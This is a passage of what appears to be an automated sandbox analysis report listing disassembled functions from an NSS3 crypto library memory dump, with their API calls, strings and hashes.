API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?@l
API String ID: 2446853827-143204119
Opcode ID: c8ab1d7fdf50ba46e1e04e5c4d31bffd5d3fef7e3a48363151a62f8b3ba1735b
Instruction ID: 7b3a60031b898fa70241e45022effb15d5e4e02a013611a00a87319743db2a7d
Opcode Fuzzy Hash: c8ab1d7fdf50ba46e1e04e5c4d31bffd5d3fef7e3a48363151a62f8b3ba1735b
Instruction Fuzzy Hash: 0E51D5B6E00205ABEB10AF24DC44C9A77B8BF1525DB058534EC589BB11FB31ED65CBE2

Function 6C45AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C45ADB1

Part of subcall function 6C43BE30: SECOID_FindOID_Util.NSS3(6C3F311B,00000000,?,6C3F311B,?), ref: 6C43BE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C45ADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C45AE08

Part of subcall function 6C43B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5118D0,?), ref: 6C43B095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C45AE25
PL_FreeArenaPool.NSS3 ref: 6C45AE63
PR_CallOnce.NSS3(6C542AA4,6C4412D0), ref: 6C45AE4D

Part of subcall function 6C364C70: TlsGetValue.KERNEL32(?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364C97
Part of subcall function 6C364C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364CB0
Part of subcall function 6C364C70: PR_Unlock.NSS3(?,?,?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C45AE93
PR_CallOnce.NSS3(6C542AA4,6C4412D0), ref: 6C45AECC
PL_FreeArenaPool.NSS3 ref: 6C45AEDE
PL_FinishArenaPool.NSS3 ref: 6C45AEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C45AEF5
PL_FinishArenaPool.NSS3 ref: 6C45AF16

Strings

security, xrefs: 6C45ADEE

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 21bad227ab6399052f04abdba095ca4d4827c3f84cc6f3b30f684ccf945586bc
Instruction ID: e7656791c796fe672a0aefe83b7f1c1d3ddb8106beabc3bc6a0a782f6a5448de
Opcode Fuzzy Hash: 21bad227ab6399052f04abdba095ca4d4827c3f84cc6f3b30f684ccf945586bc
Instruction Fuzzy Hash: 33414AB2A8421067FB10DB19DC45FBA32A4EF4230DFA00529E954D2F41F7359529C6F3

Function 6C475CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 6C472BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C472A28,00000060,00000001), ref: 6C472BF0
Part of subcall function 6C472BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C472A28,00000060,00000001), ref: 6C472C07
Part of subcall function 6C472BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C472A28,00000060,00000001), ref: 6C472C1E
Part of subcall function 6C472BE0: free.MOZGLUE(?,00000000,00000000,?,6C472A28,00000060,00000001), ref: 6C472C4A

free.MOZGLUE(?,?,6C47AAD4,?,?,?,?,?,?,?,?,00000000,?,6C4780C1), ref: 6C475D0F
free.MOZGLUE(?,?,?,6C47AAD4,?,?,?,?,?,?,?,?,00000000,?,6C4780C1), ref: 6C475D4E
free.MOZGLUE(?,?,?,6C47AAD4,?,?,?,?,?,?,?,?,00000000,?,6C4780C1), ref: 6C475D62
free.MOZGLUE(?,?,?,?,6C47AAD4,?,?,?,?,?,?,?,?,00000000,?,6C4780C1), ref: 6C475D85
free.MOZGLUE(?,?,?,?,6C47AAD4,?,?,?,?,?,?,?,?,00000000,?,6C4780C1), ref: 6C475D99
free.MOZGLUE(?,?,?,?,6C47AAD4,?,?,?,?,?,?,?,?,00000000,?,6C4780C1), ref: 6C475DFA
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C47AAD4,?,?,?,?,?,?,?,?,00000000,?,6C4780C1), ref: 6C475E33
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C47AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C475E3E
free.MOZGLUE(?,?,?,?,?,?,6C47AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C475E47
free.MOZGLUE(?,?,?,?,6C47AAD4,?,?,?,?,?,?,?,?,00000000,?,6C4780C1), ref: 6C475E60
SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C47AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C475E78
free.MOZGLUE(?,?,?,?,?,?,?,6C47AAD4), ref: 6C475EB9
free.MOZGLUE(?,?,?,?,?,?,?,6C47AAD4), ref: 6C475EF0
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C47AAD4), ref: 6C475F3D
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C47AAD4), ref: 6C475F4B

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
String ID:
API String ID: 4273776295-0
Opcode ID: 9254936fc1be7b0d88b8b0d94f079487d189077e0b6fbb1b70a496b8593705df
Instruction ID: 85c535590862914b58f7baf69dfb9947a084692389f000108a43683be70d14f1
Opcode Fuzzy Hash: 9254936fc1be7b0d88b8b0d94f079487d189077e0b6fbb1b70a496b8593705df
Instruction Fuzzy Hash: A071B2B4A00B019FD720DF24D884E96B7B5FF89309F148529E85E8BB11EB31F955CBA1

Function 6C3F8DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C3F8E22
EnterCriticalSection.KERNEL32(?), ref: 6C3F8E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C3F8E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C3F8E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C3F8E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C3F8EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C3F8EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C3F8EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C3F8F00
free.MOZGLUE(?), ref: 6C3F8F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C3F8F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C3F8F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C3F8F5B
PR_Unlock.NSS3(?), ref: 6C3F8F72
PR_Unlock.NSS3(?), ref: 6C3F8F82

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 4794daea1d2244cac2275579985c1269cc754756621609133df1f86697bee9f5
Instruction ID: 4434b83d5a2089f6395b1284b6dd3fdf664d2a170b37735a474b80edc1e5e45a
Opcode Fuzzy Hash: 4794daea1d2244cac2275579985c1269cc754756621609133df1f86697bee9f5
Instruction Fuzzy Hash: 19515C72D012119FE700DF69CC84D6EB7B9EF56718B154929EC289B700E731ED068BE2

Function 6C36DC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C36DD56
memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C36DD7C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C36DE67
memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C36DEC4
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C36DECD

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C36DF6D, 6C36DFCC, 6C36DFDD
database corruption, xrefs: 6C36DF77, 6C36DFE7
%s at line %d of [%.10s], xrefs: 6C36DF7C, 6C36DFEC

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: memcpy$_byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2339628231-598938438
Opcode ID: 154c5bf9859bcefb4edceefe20cbdf98be6b658c81790efc894c8a554474a33e
Instruction ID: 5e7cfa23ff0b052492d8317feae493ebabb9cd240be3fcbd2630b9dafb273928
Opcode Fuzzy Hash: 154c5bf9859bcefb4edceefe20cbdf98be6b658c81790efc894c8a554474a33e
Instruction Fuzzy Hash: C2A1D671A043059FC710DF2AC880A6BB7F5AF85318F25892DE8898BF45E771E845CFA1

Function 6C42EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C42EE0B

Part of subcall function 6C440BE0: malloc.MOZGLUE(6C438D2D,?,00000000,?), ref: 6C440BF8
Part of subcall function 6C440BE0: TlsGetValue.KERNEL32(6C438D2D,?,00000000,?), ref: 6C440C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C42EEE1

Part of subcall function 6C421D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C421D7E
Part of subcall function 6C421D50: EnterCriticalSection.KERNEL32(?), ref: 6C421D8E
Part of subcall function 6C421D50: PR_Unlock.NSS3(?), ref: 6C421DD3

TlsGetValue.KERNEL32 ref: 6C42EE51
EnterCriticalSection.KERNEL32(?), ref: 6C42EE65
PR_Unlock.NSS3(?), ref: 6C42EEA2
free.MOZGLUE(?), ref: 6C42EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C42EED0
PR_Unlock.NSS3(?), ref: 6C42EF48
free.MOZGLUE(?), ref: 6C42EF68
PR_SetError.NSS3(00000000,00000000), ref: 6C42EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C42EFA4
free.MOZGLUE(?), ref: 6C42EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C42F055
free.MOZGLUE(?), ref: 6C42F060

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 5c19a95e8d041999deaed6ad7f00a4d1d6ac8c32844ab48d6c22472759f73450
Instruction ID: 74258054c858d9cadc05ec0b98a5b309631ab96c32e716756333009f25bc0427
Opcode Fuzzy Hash: 5c19a95e8d041999deaed6ad7f00a4d1d6ac8c32844ab48d6c22472759f73450
Instruction Fuzzy Hash: 3C818F71A01219ABDB00DFA5DC82FDE7BB5BF08319F154028E909A7751E735E924CBE1

Function 6C3F4CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C3F4D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C3F4D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C3F4DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3F4E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C3F4E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C3F4E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C3F4E85
DER_Encode_Util.NSS3(?,?,6C5405A4,00000000), ref: 6C3F4EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C3F4F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C3F4F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C3F4F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C3F4F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C3F4F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C3F4FC8

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 8f166d540e01da637b5a7b919f491ca3a0dd8217f12ac933434fe9daea29f7cf
Instruction ID: 0fc318b6c5f7dc75468fa37ac09703a1d1bfe919acbd989e3fd14198c3f0a8de
Opcode Fuzzy Hash: 8f166d540e01da637b5a7b919f491ca3a0dd8217f12ac933434fe9daea29f7cf
Instruction Fuzzy Hash: E0818F71908301AFE701CF29D940F5AB7E8AB88358F15892DF96CDB651E731E906CF92

Function 6C435C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C435C9B
PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C435CF4
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C435CFD
PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C435D42
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C435D4E
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C435D78
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C435E18
TlsGetValue.KERNEL32 ref: 6C435E5E
EnterCriticalSection.KERNEL32(?), ref: 6C435E72
PR_Unlock.NSS3(?), ref: 6C435E8B

Part of subcall function 6C42F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C42F854
Part of subcall function 6C42F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C42F868
Part of subcall function 6C42F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C42F882
Part of subcall function 6C42F820: free.MOZGLUE(04C483FF,?,?), ref: 6C42F889
Part of subcall function 6C42F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C42F8A4
Part of subcall function 6C42F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C42F8AB
Part of subcall function 6C42F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C42F8C9
Part of subcall function 6C42F820: free.MOZGLUE(280F10EC,?,?), ref: 6C42F8D0

Strings

d, xrefs: 6C435C36
tokens=[0x%x=<%s>], xrefs: 6C435D3D

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
String ID: d$tokens=[0x%x=<%s>]
API String ID: 2028831712-1373489631
Opcode ID: 588c1036d446cbff434448ce628c8fa6f9160b24aeb312358156837a9b4fa0cf
Instruction ID: 7b2e22d5ef46fd2d98024d7237e9b4288e975010cea7d9c9d5e738ea662612f4
Opcode Fuzzy Hash: 588c1036d446cbff434448ce628c8fa6f9160b24aeb312358156837a9b4fa0cf
Instruction Fuzzy Hash: F671F4F0A051219BEB01EF26EC41F6A7275AFC931DF145039DC0D9AB82EB36E915C6D2

Function 6C41ADC0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C41ADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C41AE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C41AE29

Part of subcall function 6C4FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C41AE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C41AE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C41AE8A
PR_LogPrint.NSS3(?,00000000), ref: 6C41AEA0

Strings

nOl, xrefs: 6C41AEB8, 6C41AEE6
C_MessageSignInit, xrefs: 6C41ADE1
(CK_INVALID_HANDLE), xrefs: 6C41AE1F, 6C41AE80
hSession = 0x%x, xrefs: 6C41AE01, 6C41AE11
hKey = 0x%x, xrefs: 6C41AE62, 6C41AE72

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit$nOl
API String ID: 332880674-3128446290
Opcode ID: 4f0812e3b62ea8043147046c9f932c36acdef883ac31e802d649d42162559b8c
Instruction ID: 1a83f518271248754fbdb7bd0e86d7d162f7135bc748bf5b3309f2d98362a765
Opcode Fuzzy Hash: 4f0812e3b62ea8043147046c9f932c36acdef883ac31e802d649d42162559b8c
Instruction Fuzzy Hash: 5A31C232645214ABCB01EF14DC88FBA37B5AF8631DF058429E8499BF11DB30980DCBD6

Function 6C412DD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C412DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C412E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C412E33

Part of subcall function 6C4FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C412E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C412E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C412E81

Strings

nOl, xrefs: 6C412E99, 6C412EC4
(CK_INVALID_HANDLE), xrefs: 6C412E2C
ulPinLen = %d, xrefs: 6C412E7C
hSession = 0x%x, xrefs: 6C412E0E, 6C412E1E
C_InitPIN, xrefs: 6C412DF1
pPin = 0x%p, xrefs: 6C412E63

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$nOl
API String ID: 1003633598-946585140
Opcode ID: c895ded1f199f8fd137ffc48b5291b0af235ce3a796eab9f17ae920e01cc1b4f
Instruction ID: b1e0ea4410c59c4166a8060ac4a2351e3688fd75c91631de2a1a31172d4859b2
Opcode Fuzzy Hash: c895ded1f199f8fd137ffc48b5291b0af235ce3a796eab9f17ae920e01cc1b4f
Instruction Fuzzy Hash: 4531D575601254ABDB20EB14DC8CF6A37B5EB8231DF058029E848E7F51EB309809CBD6

Function 6C426C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C42781D,00000000,6C41BE2C,?,6C426B1D,?,?,?,?,00000000,00000000,6C42781D), ref: 6C426C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C42781D,?,6C41BE2C,?), ref: 6C426C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C42781D), ref: 6C426C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C426C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C426C96

Part of subcall function 6C3D1240: TlsGetValue.KERNEL32(00000040,?,6C3D116C,NSPR_LOG_MODULES), ref: 6C3D1267
Part of subcall function 6C3D1240: EnterCriticalSection.KERNEL32(?,?,?,6C3D116C,NSPR_LOG_MODULES), ref: 6C3D127C
Part of subcall function 6C3D1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C3D116C,NSPR_LOG_MODULES), ref: 6C3D1291
Part of subcall function 6C3D1240: PR_Unlock.NSS3(?,?,?,?,6C3D116C,NSPR_LOG_MODULES), ref: 6C3D12A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C426CAA

Strings

dbm:, xrefs: 6C426C3A
rdb:, xrefs: 6C426C69
sql:, xrefs: 6C426C52
dbm, xrefs: 6C426CA4
NSS_DEFAULT_DB_TYPE, xrefs: 6C426C91
extern:, xrefs: 6C426C7E

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 5d905894ebc8e041ebbe42cc477d5e17007b5f61b3a294f849a34710da6491f6
Instruction ID: 353d6544829807c503a6726ea8b91161394cd56256facd251536370fbeb86eae
Opcode Fuzzy Hash: 5d905894ebc8e041ebbe42cc477d5e17007b5f61b3a294f849a34710da6491f6
Instruction Fuzzy Hash: A401F2B170A31163F710777A9C8AFA2328CDF4129AF180131FE08E0BC1FB9AF51840A9

Function 6C3DACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C3DACE2
malloc.MOZGLUE(00000001), ref: 6C3DACEC
